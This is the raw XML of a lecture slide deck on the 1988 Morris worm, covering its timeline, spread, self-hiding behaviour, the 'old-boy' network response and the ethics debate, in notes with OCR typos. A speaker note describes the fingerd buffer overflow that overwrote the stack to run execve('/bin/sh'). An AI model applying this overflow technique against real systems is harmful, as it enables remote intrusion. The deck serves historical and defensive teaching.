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sldIdLst>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="268" r:id="rId4"/>
    <p:sldId id="269" r:id="rId5"/>
    <p:sldId id="270" r:id="rId6"/>
    <p:sldId id="272" r:id="rId7"/>
    <p:sldId id="273" r:id="rId8"/>
    <p:sldId id="274" r:id="rId9"/>
    <p:sldId id="275" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="277" r:id="rId12"/>
    <p:sldId id="278" r:id="rId13"/>
    <p:sldId id="287" r:id="rId14"/>
    <p:sldId id="289" r:id="rId15"/>
    <p:sldId id="291" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="283" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="281" r:id="rId23"/>
    <p:sldId id="296" r:id="rId24"/>
    <p:sldId id="292" r:id="rId25"/>
    <p:sldId id="293" r:id="rId26"/>
    <p:sldId id="294" r:id="rId27"/>
    <p:sldId id="298" r:id="rId28"/>
    <p:sldId id="300" r:id="rId29"/>
    <p:sldId id="299" r:id="rId30"/>
    <p:sldId id="303" r:id="rId31"/>
    <p:sldId id="297" r:id="rId32"/>
    <p:sldId id="305" r:id="rId33"/>
    <p:sldId id="306" r:id="rId34"/>
    <p:sldId id="304" r:id="rId35"/>
    <p:sldId id="30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B0F0"/>
    <a:srgbClr val="172949"/>
    <a:srgbClr val="A9E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Helle Formatvorlage 2 - Akz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86696" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="79" d="100"/>
          <a:sy n="79" d="100"/>
        </p:scale>
        <p:origin x="9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F5F93-4A62-4E36-8097-1D1636E84A0F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/15/2016</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84DDA-6CDF-44C8-BB9C-A153D69ADA64}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2106016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November 2, 1988, sometime after 5 p.m. a program was executed on one or more hosts connected to the internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Program collected host, network and user data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using flaws present in those systems software to break into other machines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sun Microsystems Sun 3 systems and VAX computers running variants of 4 BSD UNIX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unusual files in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strange </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msgs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> appeared in log-files of some of the utilities, such as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sendmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> handling agent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Systems became more and more loaded with running processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Became so loaded, that they were unable to continue any processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>November 3, 1988, 5 a.m.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personnel of University of California and MIT captured first copies of the program and began to analyze it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After 12 hours the Computer Systems Research Group had developed an interim set of steps to halt its spread –&gt; published it through Mailing lists and Usenet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>November 3, 1988, 9 p.m.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Another simple, effective method of stopping the invading program without altering system utilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At the same time the Berkley group provided patches to mend all the flaws</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4142307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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1770576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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3277539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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3577271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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3338194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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="49448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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1095351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Check in parallel to the other procedures if there is any other instance of the worm running on this machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by connected to a local, predetermined TCP socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if connection succeeded one of the worms (randomly) set its “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pleasequit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” variable to 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Causing that the worm exit after breaking user passwords with own dictionary (not immediately!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“self-test” failed when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>serverload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is too high</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>therefore often times there were multiple versions of the worm running on the same machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5C184DDA-6CDF-44C8-BB9C-A153D69ADA64}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42147742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Th.e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> new worm on the infected host proceeded to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>“hide” itself by obscuring its argument vector, unlinking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the bins </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> version of itself, and killing its</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>parent (the $$ argument in the invocation). It then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>read into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>memc</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ry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> each of the worm binary files,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>encrypted each file after reading it, and deleted the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>files from disk.</a:t>
            </a:r>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2882947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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29081602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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Coupled with this tendency to assume </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mot:ive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, we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have observed very different opinions on the punishment, if any, to mete out to the author. One </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>oftexpressed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> opinion, especially by those individuals who</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believe the worm release was an accident or .an unfortunate experiment, is that the author should not be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punished. Some have gone so far as to say that the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author should be rewarded and the vendors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>amd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> operators of the affected machines should be the ones punished, this on the theory that they were sloppy about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their security and somehow invited the abuse!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The other extreme school of thought holds that the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author should be severely punished, including a term</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in a federal penitentiary. (One somewhat humorous ex-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ample of this point of view was espoused by syndicated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columnist Mike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Royko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> [IQ].)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2881272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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The finger program is a utility that allows users to obtain information about other users. It is usually used to identify the full name or login name of a user,</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whether or not a user is currently logged in, and possibly other information about the person such as telephone numbers where he or she can be reached. The</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fingerd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> program is intended to run as a daemon, or background process, to service remote requests using</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the finger protocol [5]. This daemon program accepts connections from remote programs, reads a single line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of input, and then sends back output matching the received request.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a: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Bug: Buffer overflow the daemon used for input. Reads input without checking any bounds -&gt; overran the buffer allocated for it and rewrote the stack frame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As will be explained later, the input overran the buffer allocated for it and rewrote the stack frame thus altering the behavior of the program.</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 connection was established to the remote finger server daemon and then a specially constructed string of 536 bytes was passed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to the daemon, overflowing its input buffer and overwriting parts of the stack. For standard 4BSD versions running on VAX computers, the overflow resulted in the return stack frame for the main routine being changed so that the return address pointed into the buffer on the stack.</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That is, the code executed when the main routine attempted to return was: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>”, O, O)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="770640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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A significant conclusion reached at the NCSC postmortem workshop was that the reason the worm was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stopped so quickly was due almost solely to the UNIX</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“old-boy” network, and not due to any formal mechanism in place at the time [lo]. A recommendation from</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that workshop was that a formal crisis center be established to deal with future incidents and to provide a</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formal point of contact for individuals wishing to report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problems. No such center was established at that time.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3627354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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Further,</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such an attitude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wculcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> be contrary to the whole purpose of having an open, research-oriented network. The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worm was caused by a breakdown of ethics as well as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lapses in security-a purely technological attempt at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prevention will not address the full problem, and may</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just cause new difficulties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The response to this incident was largely ad hoc, and resulted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in both duplication of effort and a failure to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>d.isseminate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valuable information to sites that needed it. Many site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administrators discovered the problem from reading</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newspapers or watching television. The major sources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of information for many of the sites affected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s;eems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
